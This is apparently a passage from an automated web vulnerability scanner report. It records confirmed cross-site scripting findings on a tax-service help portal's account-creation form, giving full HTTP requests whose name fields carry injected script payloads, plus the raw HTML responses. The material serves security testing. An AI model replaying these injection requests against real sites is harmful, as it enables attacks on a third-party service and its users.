->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="10"> &nbsp; </td> </tr> <tr><td colspan="8"></td></tr> <tr><td colspan="8"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td><td width="100%" class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td></tr><tr><td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td class="form"><!-- Error message >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><br /><table cellpadding="2" cellspacing="0" border="0" width="100%"><tr><td colspan="2" class="subtitle">&nbsp;Account Creation Failed</td></tr><tr><td colspan="2" class="textcell"><table><tr><td class="textcell">Passwords must be at least 5 characters long.<br /></td></tr></table></td></tr><tr><td><font size="+1">&nbsp;</font></td></tr></table><table align="right"><tr><td><span class="smlabel"><font color="red">*</font> Denotes a required field.</span></td></tr></table><br /><table cellpadding="2" cellspacing="0" border=&qu..
- /cgi-bin/olt.cfg/php/enduser/acct_new_submit.php

/cgi-bin/olt.cfg/php/enduser/acct_new_submit.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_new_submit.php?p_sid=8D9NtJsk&p_lva=3&p_sp..

Parameters

Parameter Type Value
p_sid GET 8D9NtJsk
p_lva GET 3
p_sp GET 3
p_li GET 3
p_accessibility GET 3
p_redirect GET 3
p_countryid POST 3
p_email POST netsparker@example.com
p_email_alt1 POST netsparker@example.com
p_email_alt2 POST netsparker@example.com
p_first_name POST '"--></style></script><script>alert(0x001165)</script>
p_last_name POST Smith
p_next_page POST 3
p_passwd POST 3
p_passwd2 POST 3
p_ph_asst POST 3
p_ph_fax POST 3
p_ph_home POST 3
p_ph_mobile POST 3
p_ph_office POST 3
p_postal_number POST 3
p_provid POST 3
p_question POST 3
p_subject POST 3
p_token POST
p_userid POST 3
submit_btn POST Create Account

Request

POST /cgi-bin/olt.cfg/php/enduser/acct_new_submit.php?p_sid=8D9NtJsk&p_lva=3&p_sp=3&p_li=3&p_accessibility=3&p_redirect=3 HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_new.php
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: olt.custhelp.com
Content-Length: 444
Accept-Encoding: gzip, deflate

p_countryid=3&p_email=netsparker%40example.com&p_email_alt1=netsparker%40example.com&p_email_alt2=netsparker%40example.com&p_first_name=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x001165)%3C%2Fscript%3E&p_last_name=Smith&p_next_page=3&p_passwd=3&p_passwd2=3&p_ph_asst=3&p_ph_fax=3&p_ph_home=3&p_ph_mobile=3&p_ph_office=3&p_postal_number=3&p_provid=3&p_question=3&p_subject=3&p_token=&p_userid=3&submit_btn=Create+Account

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 23:07:49 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: rnw_enduser_login_start=LOGIN_START; expires=Fri, 29-Apr-2011 23:27:49 GMT
RNT-Time: D=112948 t=1304118469243177
RNT-Machine: 02
X-Cnection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en_US"><!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><head><meta http-equiv="Pragma" content="no-cache"/><meta http-equiv="Expires" content="-1"/><meta name="robots" content="noindex,nofollow"><link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"><title>Create a New Account</title><script type="text/javascript" src="/rnt/rnw/javascript/enduser.js" language="JavaScript"></script><script type="text/javascript"> // --------------------------------------------var _submit_accepted = false;var phone_numbers = new Array('', '', '', '', '');var p_postal_emask, p_postal_fstr, p_postal_dmask;var p_contact_phone_emask, p_contact_phone_fstr, p_contact_phone_dmask;var no_test = false, mask_str = null, cur_mask = null;var old_phone = 0;var postal_number = '';var submit_flag = true;// ----------------------------------------------------------------------------function _putCustomFieldMasks(formName){ for(i = 0; i < _fields.length; i++) if(_fields[i].name.match('_ccf_')) if(document[formName]['custom_text_' + _fields[i].name]) put_mask(_fields[i].name, document[formName]['custom_text_' + _fields[i].name].value, document[formName], 0); else if(document[formName]['custom_text_lh_' + _fields[i].name]) { put_mask(_fields[i].name, document[formName]['custom_text_lh_' + _fields[i].name].value, document[formName], 0); document.getElementById(_fields[i].name + '_mask').innerHTML=''; }}// ----------------------------------------------------------------------------function init(){}// ----------------------------------------------------------------------------function _do_submit(form){ var chk_val, ph_mask, pt_mask; var msgs = new Array( "The username you have entered contains spaces. Please try again.", "Username must not contain quote characters. Please try again.", "The passwords you have entered do not match.\n\nPlease re-enter them.", "Passwords must be at least 5 characters long."); if ((form.p_email.value != "") && (form.p_email.value == form.p_email_alt1.value || form.p_email.value == form.p_email_alt2.value || ((form.p_email_alt1.value != "") && (form.p_email_alt1.value == form.p_email_alt2.value)))) { alert("An email address must be unique across the Email Address, Email Alt 1, and Email Alt 2 fields."); return(false); } if (_submit_accepted) // prevents NN4 resubmission return(false); if (!_validate_acctinfo(form.p_userid, form.p_passwd, form.p_passwd2, 5, msgs)) return(false); chk_val = _check_fields(form.name, fld_data, _fields); form.submit_btn.disabled = chk_val; _submit_accepted = chk_val; if (!chk_val) return (false); return(chk_val);}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -function change_phone(num, sel_val){ phone_numbers[old_phone] = num.value; num.value = phone_numbers[sel_val]; old_phone = sel_val;}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -function reset_phone(){ document._main.p_contact_phone.value = ''; phone_numbers = ['', '', '', '', ''];}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -var _fields = new Array (new field('p_userid', "Username", 5, 80, 33),new field('p_passwd', "Password", 5, 0, 0),new field('p_email', "Email Address", 5, 0, 37),new field('p_email_alt1', "Email Address", 5, 0, 36),new field('p_email_alt2', "Email Address", 5, 0, 36),new field('p_first_name', "First Name", 5, 0, 33),new field('p_last_name', "Last Name", 5, 0, 33),new field('', '', 0, 0, 0));var fld_data = new field_data("is not an integer.","requires a value.","is not completely specified.","The text entered for \'%s\' exceeds its size limit of %d characters by %d characters.","must only contain valid ascii characters.","does not seem to be a valid email address.","Must contain valid furigana characters","Need to select more options.","Need to select fewer options.","Month","Day","Year","Hour","Minute","(([-!#$%&\'*+/=?^~`{|}\\w]+(\\.[-!#$%&\'*+/=?^~`{|}\\w]+)*)|(\"[^\"]+\"))@[0-9A-Za-z]+(-[0-9A-Za-z]+)*(\\.[0-9A-Za-z]+(-[0-9A-Za-z]+)*)+",0,2010,"must not contain either \'<\' or \'>\'","cannot be negative","Field contains too many characters.","Must contain a valid format character.","is not a valid format character.","Must contain a valid number.","is not a valid number.","Must contain a valid alpha-numeric.","is not a valid alpha-numeric.","Must contain a valid letter.","is not a valid letter.","Must contain a valid character.","is not a valid character.","The correct format is","The value you have entered is less than the smallest value allowed for this field.","The value you have entered is greater than the largest value allowed for this field.","is not a valid date.","is not a valid date. Please enter a date in format","MM","DD","YYYY","Minimum year is:","Maximum year is:");// ------------------------------------------------------------------ </script></head><!-- Body ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><body class="bgcolor" onLoad="_set_cursor(); init(); _putCustomFieldMasks('_main')"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"><br /><form class="block" name="_main" method="post" action="acct_new_submit.php?p_sid=CRlO5Ksk&amp;p_lva=3&amp;p_sp=&amp;p_li=3&amp;p_accessibility=&amp;p_redirect=" onSubmit="return(_do_submit(this))"><input type="hidden" name="p_next_page" value="3" /><input type="hidden" name="p_countryid" value="3" /><input type="hidden" name="p_provid" value="3" /><input type="hidden" name="p_ph_office" value="3" /><input type="hidden" name="p_ph_mobile" value="3" /><input type="hidden" name="p_ph_fax" value="3" /><input type="hidden" name="p_ph_asst" value="3" /><input type="hidden" name="p_ph_home" value="3" /><input type="hidden" name="p_postal_number" value="3" /><input type="hidden" name="p_token" value="" /><input type="hidden" name="p_subject" value="3" /><input type="hidden" name="p_question" value="3" /><!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=&p_sid=CRlO5Ksk&amp;p_accessibility=3&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=&p_sid=CRlO5Ksk&amp;p_accessibility=3&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="tab" name="live_help_tab_link" href="chat.php?OLTSite=&p_sid=CRlO5Ksk&amp;p_accessibility=3&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=&p_sid=CRlO5Ksk&amp;p_accessibility=3&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect=3"> hide accessible links </a> &nbsp;</td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="10"> &nbsp; </td> </tr> <tr><td colspan="8"></td></tr> <tr><td colspan="8"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td><td width="100%" class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td></tr><tr><td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td class="form"><!-- Error message >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><br /><table cellpadding="2" cellspacing="0" border="0" width="100%"><tr><td colspan="2" class="subtitle">&nbsp;Account Creation Failed</td></tr><tr><td colspan="2" class="textcell"><table><tr><td class="textcell">Passwords must be at least 5 characters long.<br /></td></tr></table></td></tr><tr><td><font size="+1">&nbsp;</font></td></tr></table><table align="right"><tr><td><span class="smlabel"><font color="red">*</font> Denotes a required field.</span></td></tr></table><br /><table cellpadding="2" cellspacing="0" border=&qu..
- /cgi-bin/olt.cfg/php/enduser/acct_new_submit.php

/cgi-bin/olt.cfg/php/enduser/acct_new_submit.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_new_submit.php?p_sid=8D9NtJsk&p_lva=3&p_sp..

Parameters

Parameter Type Value
p_sid GET 8D9NtJsk
p_lva GET 3
p_sp GET 3
p_li GET 3
p_accessibility GET 3
p_redirect GET 3
p_countryid POST 3
p_email POST netsparker@example.com
p_email_alt1 POST netsparker@example.com
p_email_alt2 POST netsparker@example.com
p_first_name POST Smith
p_last_name POST '"--></style></script><script>alert(0x001171)</script>
p_next_page POST 3
p_passwd POST 3
p_passwd2 POST 3
p_ph_asst POST 3
p_ph_fax POST 3
p_ph_home POST 3
p_ph_mobile POST 3
p_ph_office POST 3
p_postal_number POST 3
p_provid POST 3
p_question POST 3
p_subject POST 3
p_token POST
p_userid POST 3
submit_btn POST Create Account

Request

POST /cgi-bin/olt.cfg/php/enduser/acct_new_submit.php?p_sid=8D9NtJsk&p_lva=3&p_sp=3&p_li=3&p_accessibility=3&p_redirect=3 HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_new.php
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: olt.custhelp.com
Cookie: rnw_accessibility=1; rnw_enduser_login_start=LOGIN_START
Content-Length: 444
Accept-Encoding: gzip, deflate

p_countryid=3&p_email=netsparker%40example.com&p_email_alt1=netsparker%40example.com&p_email_alt2=netsparker%40example.com&p_first_name=Smith&p_last_name=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x001171)%3C%2Fscript%3E&p_next_page=3&p_passwd=3&p_passwd2=3&p_ph_asst=3&p_ph_fax=3&p_ph_home=3&p_ph_mobile=3&p_ph_office=3&p_postal_number=3&p_provid=3&p_question=3&p_subject=3&p_token=&p_userid=3&submit_btn=Create+Account

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 23:07:52 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: rnw_enduser_login_start=LOGIN_START; expires=Fri, 29-Apr-2011 23:27:52 GMT
RNT-Time: D=122268 t=1304118472779950
RNT-Machine: 11
X-Cnection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en_US"><!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><head><meta http-equiv="Pragma" content="no-cache"/><meta http-equiv="Expires" content="-1"/><meta name="robots" content="noindex,nofollow"><link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"><title>Create a New Account</title><script type="text/javascript" src="/rnt/rnw/javascript/enduser.js" language="JavaScript"></script><script type="text/javascript"> // --------------------------------------------var _submit_accepted = false;var phone_numbers = new Array('', '', '', '', '');var p_postal_emask, p_postal_fstr, p_postal_dmask;var p_contact_phone_emask, p_contact_phone_fstr, p_contact_phone_dmask;var no_test = false, mask_str = null, cur_mask = null;var old_phone = 0;var postal_number = '';var submit_flag = true;// ----------------------------------------------------------------------------function _putCustomFieldMasks(formName){ for(i = 0; i < _fields.length; i++) if(_fields[i].name.match('_ccf_')) if(document[formName]['custom_text_' + _fields[i].name]) put_mask(_fields[i].name, document[formName]['custom_text_' + _fields[i].name].value, document[formName], 0); else if(document[formName]['custom_text_lh_' + _fields[i].name]) { put_mask(_fields[i].name, document[formName]['custom_text_lh_' + _fields[i].name].value, document[formName], 0); document.getElementById(_fields[i].name + '_mask').innerHTML=''; }}// ----------------------------------------------------------------------------function init(){}// ----------------------------------------------------------------------------function _do_submit(form){ var chk_val, ph_mask, pt_mask; var msgs = new Array( "The username you have entered contains spaces. Please try again.", "Username must not contain quote characters. Please try again.", "The passwords you have entered do not match.\n\nPlease re-enter them.", "Passwords must be at least 5 characters long."); if ((form.p_email.value != "") && (form.p_email.value == form.p_email_alt1.value || form.p_email.value == form.p_email_alt2.value || ((form.p_email_alt1.value != "") && (form.p_email_alt1.value == form.p_email_alt2.value)))) { alert("An email address must be unique across the Email Address, Email Alt 1, and Email Alt 2 fields."); return(false); } if (_submit_accepted) // prevents NN4 resubmission return(false); if (!_validate_acctinfo(form.p_userid, form.p_passwd, form.p_passwd2, 5, msgs)) return(false); chk_val = _check_fields(form.name, fld_data, _fields); form.submit_btn.disabled = chk_val; _submit_accepted = chk_val; if (!chk_val) return (false); return(chk_val);}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -function change_phone(num, sel_val){ phone_numbers[old_phone] = num.value; num.value = phone_numbers[sel_val]; old_phone = sel_val;}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -function reset_phone(){ document._main.p_contact_phone.value = ''; phone_numbers = ['', '', '', '', ''];}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -var _fields = new Array (new field('p_userid', "Username", 5, 80, 33),new field('p_passwd', "Password", 5, 0, 0),new field('p_email', "Email Address", 5, 0, 37),new field('p_email_alt1', "Email Address", 5, 0, 36),new field('p_email_alt2', "Email Address", 5, 0, 36),new field('p_first_name', "First Name", 5, 0, 33),new field('p_last_name', "Last Name", 5, 0, 33),new field('', '', 0, 0, 0));var fld_data = new field_data("is not an integer.","requires a value.","is not completely specified.","The text entered for \'%s\' exceeds its size limit of %d characters by %d characters.","must only contain valid ascii characters.","does not seem to be a valid email address.","Must contain valid furigana characters","Need to select more options.","Need to select fewer options.","Month","Day","Year","Hour","Minute","(([-!#$%&\'*+/=?^~`{|}\\w]+(\\.[-!#$%&\'*+/=?^~`{|}\\w]+)*)|(\"[^\"]+\"))@[0-9A-Za-z]+(-[0-9A-Za-z]+)*(\\.[0-9A-Za-z]+(-[0-9A-Za-z]+)*)+",0,2010,"must not contain either \'<\' or \'>\'","cannot be negative","Field contains too many characters.","Must contain a valid format character.","is not a valid format character.","Must contain a valid number.","is not a valid number.","Must contain a valid alpha-numeric.","is not a valid alpha-numeric.","Must contain a valid letter.","is not a valid letter.","Must contain a valid character.","is not a valid character.","The correct format is","The value you have entered is less than the smallest value allowed for this field.","The value you have entered is greater than the largest value allowed for this field.","is not a valid date.","is not a valid date. Please enter a date in format","MM","DD","YYYY","Minimum year is:","Maximum year is:");// ------------------------------------------------------------------ </script></head><!-- Body ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><body class="bgcolor" onLoad="_set_cursor(); init(); _putCustomFieldMasks('_main')"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"><br /><form class="block" name="_main" method="post" action="acct_new_submit.php?p_sid=7D7P5Ksk&amp;p_lva=3&amp;p_sp=&amp;p_li=3&amp;p_accessibility=&amp;p_redirect=" onSubmit="return(_do_submit(this))"><input type="hidden" name="p_next_page" value="3" /><input type="hidden" name="p_countryid" value="3" /><input type="hidden" name="p_provid" value="3" /><input type="hidden" name="p_ph_office" value="3" /><input type="hidden" name="p_ph_mobile" value="3" /><input type="hidden" name="p_ph_fax" value="3" /><input type="hidden" name="p_ph_asst" value="3" /><input type="hidden" name="p_ph_home" value="3" /><input type="hidden" name="p_postal_number" value="3" /><input type="hidden" name="p_token" value="" /><input type="hidden" name="p_subject" value="3" /><input type="hidden" name="p_question" value="3" /><!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=&p_sid=7D7P5Ksk&amp;p_accessibility=3&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=&p_sid=7D7P5Ksk&amp;p_accessibility=3&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="tab" name="live_help_tab_link" href="chat.php?OLTSite=&p_sid=7D7P5Ksk&amp;p_accessibility=3&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=&p_sid=7D7P5Ksk&amp;p_accessibility=3&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect=3"> hide accessible links </a> &nbsp;</td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="10"> &nbsp; </td> </tr> <tr><td colspan="8"></td></tr> <tr><td colspan="8"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td><td width="100%" class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td></tr><tr><td class="form"><img height="1" width="1" 